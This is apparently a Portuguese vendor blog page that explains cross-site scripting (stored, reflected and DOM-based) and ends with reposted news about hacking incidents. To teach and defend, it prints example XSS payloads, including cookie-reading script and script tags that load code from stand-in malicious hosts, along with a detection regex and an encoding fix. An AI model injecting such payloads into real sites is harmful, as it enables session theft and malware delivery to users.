Série Ataques: Saiba mais sobre o Cross-Site Scripting (XSS)

Os Ataques nos aplicativos web é um série de artigos sobre classes de vulnerabilidades que afetam aplicativos web escritos em conjunto com a N-Stalker.

Sumário: Afinal, o que é o Cross-site Scripting?

O ataque de Cross-site scripting (XSS) consiste em uma vulnerabilidade causada pela falha nas validações dos parâmetros de entrada do usuário e resposta do servidor na aplicação web. Este ataque permite que código HTML seja inserido de maneira arbitrária no navegador do usuário alvo.

Tecnicamente, este problema ocorre quando um parâmetro de entrada do usuário é apresentado integralmente pelo navegador, como no caso de um código javascript que passa a ser interpretado como parte da aplicação legítima e com acesso a todas as entidades do documento (DOM). Na prática, o responsável pelo ataque executar instruções no navegador da vítima usando um aplicativo web vulnerável, modificar estruturas do documento HTML e até mesmo utilizar o golpe para perpetrar fraudes como phishing.

Um bom exemplo é uma aplicação como um fórum, em que o usuário tenha permissão para incluir mensagens de sua própria autoria para que os outros usuários possam ler. Se este aplicativo não filtrar corretamente os códigos HTML, um usuário mal intencionado pode injetar instruções para leitura de informações específicas do usuário legítimo, tais como códigos de sessão, e até mesmo executar tarefas específicas como enviar mensagens de maneira arbitrária para o fórum.

Tipos conhecidos de XSS

  • Persistente (Stored)

Neste caso específico, o código malicioso pode ser permanentemente armazenado no servidor web/aplicação, como em um banco de dados, fórum, campo de comentários etc. O usuário torna-se vítima ao acessar a área afetada pelo armazenamento do código mal intencionado.

Esse tipo de XSS são geralmente mais significativos do que outros, uma vez que um usuário mal intencionado pode potencialmente atingir um grande número usuários apenas com uma ação específica e facilitar o processo de engenharia social. Em alguns casos, o navegador afetado pode até mesmo se comportar como se estivesse infectado por um worm, replicando cópias para cada usuário que execute o código mal intencionado.

Exemplo de XSS persistente:

Vamos supor que exista uma aplicação web que permita a inserção de código HTML integralmente nos campos de entrada do nome e sobrenome no formulário para atualização das preferências do usuário:

<script>alert(document.cookie)</script>

Desta forma, quando for executada uma busca pelos usuários cadastrados, o código HTML acima será executado assim que o usuário aparecer na relação dos resultados da busca.

Variações deste ataque podem ser utilizadas para permitir que o usuário mal intencionado modifique o código arbitrário de acordo com o tipo de requisição ou cliente infectado, utilizando, por exemplo, uma referência a um script remoto:

<A HREF="http://confiavel.org.br/busca.cgi?CC=<SCRIPT SRC='http://malicioso.ck.bz/badguy.js'></SCRIPT>"> Vá para Confiável.org.br</A>

Neste exemplo, o site confiável não possui filtros apropriados para proteger-se da inserção do código HTML que faz referência ao script malicioso:

echo ‘<h1>Seu termo de busca é : ’ + getParameter(‘CC’) + ‘</h1>’;

O código HTML executado no navegador do usuário alvo resultaria na carga arbitrária de um script estranho à aplicação e contendo quaisquer tipos de instruções que o usuário mal intencionado deseje:

<h1>Seu termo de busca é <SCRIPT SRC='http://malicioso.ck.bz/badguy.js'></SCRIPT></h1>
  • Refletido (Reflected)

A exploração dessa vulnerabilidade envolve a elaboração de uma solicitação com código a ser inserido embutido e refletido para o usuário alvo que faz a solicitação. O código HTML inserido é entregue para aplicação e devolvido como parte integrante do código de resposta, permitindo que seja executado de maneira arbitrária pelo navegador do próprio usuário.

Este ataque geralmente é executado por meio de engenharia social, convencendo o usuário alvo que a requisição a ser realizada é legítima. As consequencias variam de acordo com a natureza da vulnerabilidade, podendo variar do sequestro de sessões válidas no sistema, roubo de credenciais ou realização de atividades arbitrárias em nome do usuário afetado.

Exemplo de XSS refletido:

Tome-se como exemplo um aplicativo web que receba um parâmetro “nome” contendo a identificação do usuário legítimo e apresente o conteúdo sem quaisquer filtros:

http://www.vul.site/welcome.html?name=fulano
echo ‘<h1>Olá usuário ‘ + getParameter(‘name’) + ‘</h1>';

Considere que um usuário mal intecionado altere o atalho para incluir um código arbitrário a ser executado no navegador do usuário alvo:

http://www.example.com/welcome.html?name=<script>alert(document.cookie)</script>

Se um usuário legítimo e com acesso ao aplicativo vulnerável realizar a requisição acima, o código javascript ‘alert(document.cookie)’ será executado sem ressalvas no navegador do usuário alvo.

Outros exemplos de ataque podem incluir a substituição de todos os links válidos do aplicativo web pode um referência a um arquivo executável contendo um vírus ou um cavalo de tróia:

http://www.example.com/welcome.html?name=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a");AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>

Efeito do ataque:

Este tipo de ataque responde por aproximadamente 75% das vulnerabilidades de XSS que afetam aplicativos web na Internet.

  • Baseados no DOM (DOM based)

O Document object Model (DOM) é o padrão utilizado para interpretar o código HTML em objetos a serem executados pelos navegadores web. O ataque de XSS baseado no DOM permite a modificação de propriedades destes objetos diretamente no navegador do usuário alvo, não dependendo de nenhum interação por parte do servidor que hospeda o aplicativo web.

Diferentemente do ataque de XSS persistente ou refletido, o ataque baseado em DOM não necessita de interações diretas com o aplicativo web e utiliza-se de vulnerabilidades existentes na interpretação do código HTML no ambiente do navegador do usuário alvo.

Exemplo de XSS baseado em DOM:

Tome-se como exemplo um aplicativo que contém um javascript que escolhe o tipo de estilo a ser utilizado de acordo com o parâmetro passado pelo usuário:

<script>
var estilo = ‘style’ + location.hash + ‘.css’;
document.write(‘<link rel="stylesheet" type="text/css" href=”’ + estilo + ’" />’);
</script>

Agora tome-se como exemplo um link construído de maneira a carregar um código arbitrário, conforme exemplo abaixo:

http://vitima.com/teste.html#><script src=”http://bad/bad.js”></script>

Quando executado no navegador do usuário, a referência acima será utilizada para inserir um script mal intencionado no contexto do aplicativo web, sem o conhecimento do aplicativo web afetado (pelo lado do servidor).

Qual o impacto e as principais consequências do ataque?

Os ataques de XSS são frequentemente utilizados para causar danos aos usuários legítimos de um aplicativo vulnerável. Para a corporação, o impacto da vulnerabilidade de XSS é principalmente sua imagem e a possibilidade de utilização da falha para a distribuição de phishing e facilitação de fraudes.

Dentre as principais consequências para o usuário afetado, incluem:

    • Seqüestro de sessão de usuários;
    • Alteração do código HTML do aplicativo (visivel somente do lado do cliente);
    • Redirecionar o usuário para sites maliciosos;
    • Alteração do objeto DOM para captura de dados ou envio de malware.

Como evitar ataques de XSS?

Você deve se assegurar que todas as entradas de dados do usuário não são confiáveis. Todos dados de usuário a serem utilizados para construção do contexto HTML (corpo, atributo, JavaScript, CSS ou URL) devem ser verificados para assegurar que não contenham nenhum conteúdo ativo (JavaScript, ActiveX, Flash, Silverlight, etc) e que sejam codificados de maneira apropriada, por exemplo, transformando metacaracteres em códigos de escape HTML.

Uma boa referência para apoiar a filtragem de dados é o dicionário de ataques XSS fornecido pelo OWASP:

Por outro lado, os ataques de XSS também podem ser evitados pela implementação de um filtro de aplicações web, mais conhecido como Web Application Firewall, e também por meio de mecanismos de prevenção que estão embutidos em navegadores modernos.

Exemplo de filtro utilizando o Apache

Utilizando-se do módulo rewrite do Apache, as URL podem ser avaliadas de acordo com uma expressão regular para determinar a presença de metacaracteres nos dados recebidos do usuário. Por exemplo, a seguinte expressão regular pode ser usada para detectar caracteres alfanuméricos entre as tags ou barras:

/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/i

Exemplo de correção para códigos vulneráveis:

Este é um exemplo de código em ASP.NET (v1.1) vulnerável, cuja função é de pesquisa e retorno dos dados enviados pelo usuário:

‘ SearchResult.aspx.vb

Imports System

Imports System.Web

Imports System.Web.UI

Imports System.Web.UI.WebControls

Public Class SearchPage Inherits System.Web.UI.Page

Protected txtInput As TextBox

Protected cmdSearch As Button

Protected lblResult As Label Protected

Sub cmdSearch _Click(Source As Object, _ e As EventArgs)

// Do Search…..

    // …………

lblResult.Text=”You Searched for: ” & txtInput.Text

// Display Search Results…..

// …………

End Sub

End Class

Para remover a falha e mitigar a vulnerabilidade, se faz necessário incluir uma validação dos dados de entrada do usuário por meio da inserção de um “filtro” que evite que códigos HTML sejam expostos explicitamente sem uma codificação apropriada:.

Response.Write Server.HtmlEncode(inputTxt.Text)

Como a RedeSegura pode te ajudar?

A RedeSegura possui uma solução completa para gestão de vulnerabilidades em aplicativos web, seja qual for o seu tipo de indústria e tamanho do seu aplicativo. Saiba mais detalhes sobre nossa metodologia:

Contate-nos ainda hoje para obter mais detalhes da nossa solução e como podemos ajudá-lo na missão de manter seus aplicativos web seguros.

Exemplo de vídeos de ataque

  • Penetration Testing: Cross-Site Scripting Explained – 7Safe

  • OWASP Appsec Tutorial Series – Episode 3: Cross Site Scripting (XSS)

 

Hackers roubam R$ 9 milhões de banco na África do Sul

Invasores acessaram o sistema do banco postal do país. Golpe ocorreu durante o recesso de fim de ano.

A Agência Nacional de Inteligência (NIA) e a polícia da África do Sul estão investigando uma fraude que teria causado um rombo de 42 milhões de rand (cerca de R$ 9,2 milhões) ao Banco Postal, que opera junto ao serviço de correios. Os criminosos teriam obtido acesso ao sistema do banco e realizado desvios para contas fraudulentas. Os saques foram efetuados durante os três dias do recesso de ano novo.

De acordo com o jornal “Sunday Times”, os criminosos teriam conhecimento sobre os sistemas internos do banco postal. Um computador de um funcionário também dos correios teria sido comprometido e controlado pelos hackers.

No final de 2011, os criminosos abriram várias contas bancárias fraudulentas para receber o dinheiro desviado. Quando o recesso de ano novo começou, os criminosos teriam acessado o sistema do banco e injetado fundos e liberado limites em suas contas. Em seguida, começaram os saques, que aconteceram em caixas eletrônicos de pelo menos três províncias diferentes do país.

Os saques pararam poucas horas antes do recesso terminar. Nesse ponto, os R$ 12 milhões já haviam sido sacados. O banco afirmou que nenhum de seus clientes teve alterações em suas contas devido ao ataque.

A notícia da invasão, segundo o “Sunday Times”, ocorre em um momento em que o banco está em busca de autonomia para oferecer seus serviços e concorrer com instituições financeiras privadas no país.

Fonte: http://g1.globo.com/tecnologia/noticia/

Hackers publicam e-mails de clientes da Stratfor

Hackers ligados ao grupo Anonymous publicaram centenas de milhares de endereços de e-mail que afirmam pertencer a clientes e pessoas registradas no site da empresa de análise de inteligência Strategic Forecasting.

A lista, publicada na quinta-feira, inclui endereços de e-mail que parecem pertencer a pessoas que trabalham para grandes corporações, militares norte-americanos e grandes empresas terceirizadas do setor de defesa -informações que poderiam ser usadas por hackers para enviar e-mails com vírus buscando obter informações em uma tática conhecida como “spear pishing”.

A facção “Antisec” do Anonymous revelou na semana passada que havia feito um ataque contra a empresa, conhecida como Stratfor e tida como uma outra CIA, pois coleta dados de inteligência de livre acesso sobre crises internacionais.

Os hackers prometeram causar danos ao divulgar dados roubados do grupo.

A Stratfor emitiu um comunicado confirmando que os e-mails publicados foram roubados do banco de dados da empresa, afirmando que estava colaborando com a investigação legal sobre o assunto e conduzindo a sua própria.

Em uma publicação no site de compartilhamento de dados pastebin.com, os hackers disseram que a lista inclui informações sobre 75 mil clientes da Stratfor e aproximadamente 860 mil pessoas que se registraram em seu site. O texto disse que tal volume inclui cerca de 50 mil endereços de e-mail pertecentes aos domínios do governo dos EUA .gov e .mil.

Fonte: http://info.abril.com.br/noticias/seguranca/

Hackers chineses invadem sistemas da Câmara de Comércio dos EUA

Segundo jornal, rede do órgão esteve exposta durante mais de um ano. Grupo responsável é suspeito de manter vínculos com o governo chinês.

Hackers chineses contornaram as defesas da Câmara do Comércio dos Estados Unidos em 2010 e conseguiram acesso a informações sobre a organização e seus 3 milhões de membros, publicou o “Wall Street Journal” nesta quarta-feira (21).

Em Pequim, a China desconsiderou a reportagem. O jornal, mencionando pessoas não identificadas, publicou a operação contra o principal grupo de lobby de negócios norte-americano, que envolveu pelo menos 300 endereços de internet e foi descoberta em maio de 2010.

O jornal informou que não se sabe o volume das informações obtidas pelos hackers ou quem pode ter tido acesso à rede no mais de um ano em que ela esteve exposta antes que a violação fosse descoberta.

O grupo por trás do ataque é suspeito pelos EUA de manter vínculos com o governo chinês, disse uma das fontes ao jornal. O FBI informou a Câmara de Comércio que servidores na China estavam obtendo informações ilegalmente em suas redes, segundo a fonte.

Liu Weimin, porta-voz do Ministério do Exterior chinês, descartou a reportagem. “Não há o que dizer sobre essa divulgação infundada de supostos ataques de hackers, e nada surgirá disso”, disse ele em declaração em Pequim. “A lei chinesa proíbe a ação de hackers”.

Informações confidenciais
A Câmara de Comércio emprega 450 pessoas e representa interesses de negócios, entre os quais a maioria das grandes empresas norte-americanas, no Congresso. O jornal publicou que os e-mails acessados revelavam os nomes de empresas e pessoas importantes que mantinham contato com a Câmara, e também permitiram acesso a documentos de política comercial, atas de reuniões, relatórios de viagem e agendas.

O que é incomum quanto a isso é que o responsável foi claramente alguém muito sofisticado, que sabia exatamente quem somos e visou pessoas específicas, utilizando ferramentas sofisticadas para tentar obter informações“, disse David Chavern, vice-presidente de operações da organização, ao “Wall Street Journal”.

A China é frequentemente mencionada como suspeita em diversos ataques de hackers aos EUA. Em agosto, o Pentágono alertou em relatório ao Congresso que as operações de hackers na China poderiam ser utilizadas para fins militares abertos no futuro.

Fonte: http://g1.globo.com/tecnologia/noticia/

Square Enix teve site hackeado: dados de membros podem ter vazado

Empresa japonesa divulga nota dizendo que informações como cartões de crédito estão seguras
A Square Enix teve seus sites nos EUA e Japão hackeados. Segundo nota divulgada à imprensa, algumas informações de usuários, como endereços e nomes completos, podem ter vazado e caído nas mãos dos invasores. Entretanto, números de cartões de crédito estão seguros por estarem armazenados em outro servidor.

Os sites afetados estão fora de serviço, por estarem passando por investigação feita pela própria Square Enix. Ainda não foi informada uma previsão de retorno ao funcionamento normal.

A Square Enix é uma multinacional japonesa que produz jogos eletrônicos. Franquias famosas de RPG como Final Fantasy e Dragon Quest estão sob o selo da empresa.

Fonte: http://olhardigital.uol.com.br/negocios/seguranca/noticias/

Lockheed é atacada por hackers

A Lockheed Martin e outras empresas de defesa dos Estados Unidos foram atacadas por hackers que utilizaram uma vulnerabilidade antes desconhecida no Adobe Reader, o mais recente em uma série de persistentes ataques contra os fabricantes norte-americanos de armas, informaram especialistas em segurança na quarta-feira.

A Lockheed, maior fornecedora do Pentágono, anunciou ter detectado a tentativa de ataque em suas atividades normais de monitoração, e imediatamente notificou a Adobe. A empresa disse que seus sistemas de informação não chegaram a ser violados.

A Adobe atribuiu à Lockheed e a outras companhias do Defense Security Information Exchange (DSIE), um grupo de grandes empresas de defesa que compartilham informações sobre ataques cibernéticos, o crédito pela descoberta e divulgação da vulnerabilidade crítica.

O DSIE envolve empresas que também são parte do “Defense Industrial Base”, um programa-piloto que envolve grandes empresas de defesa que trocam informações sobre ameaças a redes entre si e com o governo.

Wiebke Lips, porta-voz da Adobe, disse ter recebido informações de que a vulnerabilidade “está sendo explorada ativamente para ataques limitados e dirigidos especificamente ao Adobe Reader 9.4.6 para o Windows”, mas se recusou a dar mais detalhes. A Adobe anunciou que distribuirá uma atualização para corrigir o problema na semana que vem.

Sam Visner, executivo de segurança cibernética da CSC, disse que o mais recente incidente era interessante dado o número de ameaças reportado pelas empresas, a capacidade do malware de cifrar dados enquanto ainda armazenados no computador alvo e a natureza específica do ponto usado para conquistar acesso.

Os emails de ataque incluem um documento PDF intitulado “guia sobre contratos”, que pode interessar às empresas de defesa. Caso aberto, o malware oculto no arquivo PDF pode comprometer o computador alvo.

“Tudo isso aponta para uma ameaça desenvolvida deliberadamente a fim de obter informações das empresas de defesa,” disse Visner. Ele não quis informar se a CSC foi alvo do ataque.

Fonte: http://info.abril.com.br/noticias/seguranca/

Grupos hackers invadem páginas de municípios

Os grupos de ativistas hackers AntiSecBRTeam e iPiratesGroup, ligados ao Anonymous, iniciaram na manhã de hoje ataques contra páginas de governos municipais, em uma operação batizada de #OpAmazonia.

Páginas da Prefeitura de Itu (SP), de Feira de Santana (BA), de Uberlândia (MG), de Maceió, de Caturaí (GO), Santa Rosa de Goiás (GO) e da Secretaria de Cultura do Distrito Federal foram os primeiros alvos da operação.

As páginas invadidas tiveram a interface modificada (ataque conhecido como Deface) e os grupos publicaram um vídeo convocando a todos para se informar e discutir temas ecológicos polêmicos que, segundo os grupos, estariam beneficiando somente grandes empresas multinacionais.

No vídeo (veja a seguir), os grupos reivindicam mais transparência do governo e mudanças nos polêmicos projetos da usina hidrelétrica de Belo Monte e do novo Código Florestal.

“Mas apesar de tudo queremos mudança, além de transparência. Queremos um projeto que não prejudique a população, principalmente a comunidade indígena, e o meio ambiente”, afirmou um dos integrantes do grupo iPiratesGroup.

Os grupos afirmam que os alvos foram escolhidos aleatoriamente e que a operação não tem prazo para acabar, e os ataques acontecerão conforme a repercussão das ações. Até o fechamento desta matéria, as páginas atacadas continuavam fora do ar.

Fonte: http://info.abril.com.br/noticias/seguranca/

HTML5 criará desafios para profissionais de segurança

Segundo a empresa de segurança Sophos, os riscos de uso da nova linguagem são tão grandes quanto os benefícios.

A mudança para o HTML5 permitirá uma série de novos aplicativos da Web, mas também criará desafios para os profissionais de segurança, de acordo com a empresa de segurança Sophos.

Nas suas previsões para 2012, a empresa identifica novos padrões Web como alguns dos principais riscos de segurança para o próximo ano. Embora estas tecnologias ofereçam novas e impressionantes capacidades – especialmente se consideramos o desenvolvimento de aplicativos Web mais ricos, elas também introduzir novos vetores de ataque, diz a Sophos.

O HTML4 impulsionou o conteúdo na Web por muitos anos, mas é uma linguagem muito básica, que sempre obrigou os desenvolvedores a complementá-la com o uso de add-ons, como JavaScript  e Flash. Estes add-ons são muitas vezes cheios de vulnerabilidades.

E embora o HTML5 elimine a necessidade da maioria dos plugins, por ser mais sofisticado, vir com um banco de dados completo (possibilitando o armazenamento de gigabytes de informação), além de permitir recursos como animação full-frame, realidade virtual em 3D, aplicações ou lojas dentro do navegador, não deixa de ter falhas.

De acordo com James Lyne, analista-sênior da Sophos, o armazenamento de dados dentro do navegador o tornará alvo de cibercriminosos. “Tradicionalmente, o browser tem sido uma porta de entrada para criminosos virtuais no seu PC, agora eles vão estar tentando atacar o próprio navegador para roubar seus dados”, afirma Lyne.

Novas formas de isolamento de processos no HTML5 também levam a “clickjacking” (técnica de enganar os internautas para que revelem informações confidenciais ou de controle de seu computador enquanto clicam em um link aparentemente inócuo), e a novas questões em torno do uso de cookies.

“O HTML5 poderia ter novos ‘super-uber-cookies'”, disse Lyne. “Se as pessoas não codificam seus sites corretamente, os bandidos podem montar uma enorme base de dados de URLs.”

Apesar desses problemas potenciais, Lyne garante que há uma série de recursos de segurança a usar no HTML5. Há agora, do lado do cliente, a validação de entrada, bem como bibliotecas que podem ajudar a lidar com ataques específicos, como o de injeção de SQL.

“Com o tempo, o HTML5 vai resolver muitos dos problemas que temos, mas como acontece com qualquer tecnologia nova, você tende a ter uma regressão inicialmente”, afirma o especialista. “Precisamos ter certeza de que não estarmos adotando casualmente um pesadelo.”

Fonte: http://idgnow.uol.com.br/seguranca/

Hackers invadem e roubam dados de site da ONU

Grupo identificado como Team Poison divulga senhas de e-mails de funcionários do PNUD para protestar contra atrocidades da organização

Hackers invadiram o site do Programa das Nações Unidas para o Desenvolvimento (PNUD) e divulgaram centenas de senhas de e-mails de funcionários, em um dos mais graves ataques cibernéticos da história da ONU. Autodenominado “Team Poison”, o grupo também publicou uma mensagem acusando as Nações Unidas de corrupção, fraude e atrocidades.

Especialistas em segurança virtual disseram que o ataque foi sofisticado. Não está descartada a possibilidade de que países estejam envolvidos na operação. Recentemente, o grupo conhecido como Anonymous, aliado do Team Poison, também atacou sites de governos e de entidades internacionais.

Os hackers, na mensagem colocada no site, também responsabilizaram a ONU por supostas atrocidades em Darfur, Ruanda, ex-Iugoslávia e Israel. “Um Senado para a corrupção global, as Nações Unidas facilitam a introdução de uma nova ordem mundial e um governo mundial”, afirmou o grupo no comunicado postado na internet.

Segundo o Team Poison, “a ONU tornou-se um monstro que precisa ser controlado. (A entidade) é uma fraude”.

Na mira. A ONU declarou que as informações divulgadas pelos hackers são antigas e sem importância. “Nenhuma das senhas está ativa”, disse Sausan Ghocheh, porta-voz do PNUD. Entretanto, os especialistas em segurança cibernética discordam. Eles diziam ontem que os dados são recentes.

Mais grave, em vídeo no YouTube, os hackers exibem até mesmo dados da vida pessoal de alguns membros do PNUD. Informações detalhadas de contas da Organização Mundial de Saúde (OMS) também foram atacadas pelo Team Poison. No Twitter, os hackers afirmaram que podem divulgar “e-mails comprometedores” da ONU, da BBC e da Fox News.

Esta semana, os hackers do Team Poison e do Anonymous anunciaram que juntarão forças para atacar o sistema financeiro na “Operação Robin Hood”. Eles pretendem invadir os dados de contas de banqueiros e transferir os fundos para movimentos como o Ocupe Wall Street.

O governo americano considera o combate a hackers uma prioridade. Uma espécie de Exército cibernético está sendo treinado pelo Pentágono para enfrentar os ataques não apenas destes grupos, como também de outros países. Há suspeitas de que chineses, russos e iranianos tenham tentado realizar ações contra sites do governo americano.

Ao mesmo tempo, instalações nucleares iranianas teriam sido “contaminadas” por um vírus atribuído aos serviços de inteligência de Israel e dos EUA.

Fonte: http://www.defesanet.com.br/cyberwar/noticia/